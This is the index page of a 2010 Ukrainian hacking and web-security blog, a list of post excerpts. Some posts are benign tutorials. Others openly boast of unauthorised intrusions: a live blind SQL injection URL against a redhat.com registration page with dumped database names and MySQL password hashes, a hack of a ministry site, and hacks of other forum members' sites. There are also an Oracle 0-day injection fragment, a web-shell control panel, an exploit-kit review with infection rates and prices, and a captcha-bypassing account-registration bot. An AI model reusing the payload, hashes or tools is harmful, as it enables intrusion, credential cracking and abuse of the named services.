Ukrainian Security Community - Блог спеціалістів з безпеки веб-додатків

Truecrypt, VBS, Acer – автоматизуємо монтування прихованих образів

Dimi4 — Tue, 27 Jul 2010 17:25:04 +0000

Давно нічого тут не писалось, тому вирішив трохи освіжити блог, та й нагадати начим читачам що ми існуєм). Отож почнем.. Прикупив собі новий ноутбук – Acer Aspire 5738z. Повинен сказати – просто краса, ноутбук і справді непоганий. У зв’язку з збільшенням квоти на харддиску вирішив завести собі окремий прихований розділ, закриптований trucrypt. Все пройшло чудово, розділ [...]

“Піднімаємо” свій IRC-bouncer

poma — Fri, 28 May 2010 19:54:32 +0000

Привіт =) В цьому пості я постараюсь розказати ( і показати ) як встановили \ налаштувати свій ірц-баунсер (IRC bouncer) на машину з ОС Windows =) Якшо поконкретніше, то будемо ставити psybnc 2.3. І для цього нам потрібен дедік, VPS, чи VDS з виділеним IP =) 1) Для початку нам потрібно скачати psybnc. І бажано це зробити з офф сайту: [...]

C#: привязка програми

poma — Tue, 25 May 2010 10:52:07 +0000

Привіт =) В минулому пості я розказував про обфускацію коду, в цьому розкажу як створити свою “привязку” програми до конкретного компа. Для початку, нам потрібно включити System.Management в наш проект. Робиться це просто: І у відкритому діалозі вибираємо System.Management: Далі потрібно підключити декілька модулів в наш проект: using System.Net; using System.Management; using System.Management.Instrumentation; using System.IO; Далі потрібно придумати цікавий і запутаний алгоритм відправки коду на [...]

C# обфускація коду

poma — Thu, 13 May 2010 15:40:26 +0000

Знаю, знаю.. перше шо ви подумали – “таких статтей\доків є куча в мережі..”.. Причиною написання цієї замітки стала нехватка укр-статей в інтернеті.. Наприклад мені так і не вдалося знайти цікаву статтю, з кольоровими скріншотами і з детальною інструкцією встановлення \ використання обфускатора.. Сам недавно стовкнувся з проблемою захисту коду від реверсу в С#.. А так, як статей на цю [...]

Обмежуємо швидкість скачування контенту через php-скрипт

poma — Thu, 13 May 2010 12:08:36 +0000

Віддавати контект через php це нонсенс трошки звичайно.. але деколи так зручніше, та й зручніше Лімітувати швидкість віддачі також повинен не php скрипт, бо нагружає сервер непотрібною роботою та й витрачає його память, а сервер. Але через сервер це робити – трошки геморно Але шо поробиш, якшо немає “прямого” доступу до налаштувань apache, навіть якщо [...]

У гостях мемберів антічату ;-) або дружній взлом rebz.net та x2b.ru

snake — Fri, 07 May 2010 10:58:05 +0000

Привіт не з РОА. Щось довго я тут нічого не писав, ось вирішив вам розповісти про дружній взлом сайтів усім відомих мемберів проекту antichat.ru – Rebz та Qwazar. Якщо для першого це основне місце прибування, то для другого – це майже забутий проект. Одразу скажу,що ніякої інформації з rebz.net,blog.rebz.net та quest.rebz.net не буде ні тут, ні [...]

Mail.Ru автореггер

poma — Mon, 19 Apr 2010 17:53:25 +0000

перл \ багатопоточність \ антикапча \ проксі #--==-==-==--==-=-=--=-==-=--=-==-=-- # автореггер? 1 = да, 0 = нет my $autoregger = 1; # домены, в которых можно регистрировать my @domens = ('mail.ru', 'bk.ru', 'list.ru', 'inbox.ru'); # потоки my $threads = 1; # использовать прокси my $use_proxy = 0; # прокси файл my $proxy_file = 'proxy.txt'; #URL антикапчи my $AC_HOST = 'antigate.com'; #Ключ антикапчи my $AC_KEY [...]

Google Chrome: самі пишемо аддони

poma — Sun, 18 Apr 2010 01:01:01 +0000

Недавно було потрібно написати свій плагін для Хрома, прийшлося “вникнути” в алгоритм написання таких плагінів ) Про то , як написати свій плагін для Хрома – читаємо далі.. Спочатку нам потрібно зайти в спеціальне меню, в меню для плагінів (розширень): chrome://extensions/ Там є “Режим розробника” – це для нас! =) Жмемо.. Появляється три кнопочки: перша для загрузки аддону з папка (у [...]

Знімаємо капелюха або .redhat.com sql-inj ;-)

snake — Wed, 14 Apr 2010 10:17:59 +0000

Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y. Не буду тягнуть кота за яйця: http://www.es.redhat.com/training/register.php?course=EX333&date=20101119+скуля--+&country=BE3&ref_id= @@tmpdir: /tmp/ @@basedir: /usr/ version(): 5.0.77-log database(): redhateurope user(): www@localhost @@datadir: /var/lib/mysql/ @@version_compile_os: redhat-linux-gnu (що не дивно )))) redhatapac redhatcn test email redhates _orms redhatfr box_us redhatin redhatbr redhatit redhatde redhatkr mysql redhateurope information_schema drupal redhatglobal redhatcz redhatlatam mysql.user www:*49D3CEBD189B8C5D4A47C975133BB2357A327585 repl:*F317577FF00A2A4112982CAE6A174DF23557C02F root:*F317577FF00A2A4112982CAE6A174DF23557C02F drupal:*7AFEAE5774E672996251E09B946CB3953FC67656

TARGET: ORACLE. 0day експлойт

dsu — Mon, 12 Apr 2010 10:58:50 +0000

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date. ... 30 CUR := DBMS_SQL.OPEN_CURSOR; 31 BEGIN 32 33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, [...]

madShellC0ntr01 – система для роботи з шеллами

Dimi4 — Sun, 11 Apr 2010 19:07:24 +0000

madShellC0ntr01 v1.2 Писався софт достатньо давно, та і виключно в цілях ознайомлення Якщо чесно, то я вже навіть не пам’ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell. Меню: Shell List Stats Add shells Command Execution Logs Думаю все інтуїтивно зрозуміло (: В версії 1.2 система [...]

€0,51 Skype нахаляву

poma — Fri, 02 Apr 2010 20:05:43 +0000

1 квітня стартувала спільна акція Skype і Приватбанка з розповсюдження безкоштовних ваучерів для поповнення рахунку популярного інтернет-телефону. Протягом періоду дії акції з 01.04.10 по 08.04.10 кожен бажаючий зможе взяти участь відразу в двох конкурсах і гарантовано поповнити не тільки свій рахунок Skype, але і розіграти суми поповнення для своїх друзів. http://skype.privatbank.ua/ 1. Сколько стоят звонки между абонентами Skype? Q: [...]

Тест зв’язки експлойтів Eleonore exploits pack

Dimi4 — Tue, 30 Mar 2010 15:10:18 +0000

Хочу надати вам інформацію про тестування зв’язки експлойтів Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти MDAC MS009-02 Telnet – Opera Font tags – FireFox PDF collab.getIcon PDF Util.Printf PDF collab.collectEmailInfo DirectX DirectShow Spreadsheet Середній пробив характерний для звязки: usa: 5-15% mix: 10-25% Ціни: Власне зв’язка = 700$ Чищення від АВ = 50$ Ребілд на інший домен = 50$ Як не дивно, та в системі [...]

Пожежа в дата-центрі хостингу HOSTING.UA

Dimi4 — Sun, 28 Mar 2010 18:02:53 +0000

Увечері в суботу 27 березня, близько 21:00 за київським часом на другому поверсі бізнес-центру “Фабрика Бізнесу” за адресою м. Одеса вул. Дальницька, 46, де знаходиться датацентр одного з найбільших на Україні хостинг-провайдерів HOSTING.UA почалася пожежа. Встановлена в датацентрі система пожежогасіння з нез’ясованих причин не спрацювала. Сигнал від датчиків надійшов на пульт системи пожежогасіння, проте обладнання не [...]

Виводим сайт в топ на UA TOP Bloggers або взлом top.blog.net.ua

Dimi4 — Fri, 26 Mar 2010 16:12:12 +0000

Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи. Що треба щоб бути в топі? UA TOP Bloggers визначає позиції сайту за такими показниками: Кількість хостів (унікальні користувачі) Кількіст [...]

0-day експлойт для Internet Explorer

Dimi4 — Fri, 12 Mar 2010 15:03:09 +0000

Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп’ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com. Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах: – Microsoft Internet Explorer 7, Windows Vista SP2 – Microsoft Internet Explorer 7, Windows XP SP3 – Microsoft Internet Explorer 6, [...]

клас для роботи з антикапчею на C#

poma — Mon, 08 Mar 2010 18:29:36 +0000

готовий, зручний клас для роботи з антикапчою на шарпі.. клас і опис під катом =) доречі, вітаю прекрасну половину людства з 8м березням ) змінні: public bool debug = false; режим дебагу: якшо активний - "клас" буде вас сповіщати про всі свої дії ) [...]

Взлом Міністерства Освіти і Науки України – стаття в хакері

Dimi4 — Mon, 01 Mar 2010 19:34:27 +0000

В журналі “][акер" #134 2010 р. вийшла моя стаття "GOV сайты под угрозой". Далі оригінал статті на російській мові. GOV сайты под угрозой Взлом сайта Министерства образования и науки Украины Paketik (http://uasc.org.ua) (З невідомих причин в журналі надрукували "Анонім", хоча я подавав саме такі дані) В последнее время мне все чаще попадаются уязвимые государственные сайты. А причина банальна: сайты [...]

GetEngine v0.1

admin — Fri, 26 Feb 2010 14:10:24 +0000

скрипт для автоматичного визначення імені і версії двигла на сайті по локальній базі. яп: перл дата останнього обновлення бази: 21.07.2009 розпізнає: ~70 движків (та їх версій) запуска: 1.pl site.com запуска з повним відображенням процесу: 1.pl site.com -debug http://www.sendspace.com/file/vii235 http://uasc.org.ua/files/GetEngine.zip

Ідеальна безпека сайту

presidentua — Mon, 22 Feb 2010 12:31:11 +0000

Найпопулярніше питаня до нас це “Як зробити, щоб нічого не робити, а сайт був супер-безпечний”, і постійно ми відповідали по різному максимально приховуючи АБСОЛЮТНО-СУПЕР-СЕКРЕТНУ технологію, що була розроблема століння назад. І лише сьогодні цім секретом поділимося ), тож якщо ви хочете створювати безпечний сайт, то ось 5 рекомендацій: При програмуванні використовуйте фреймворки, типу ЗендФреймворка, КодеІгнайтера, Джанго, [...]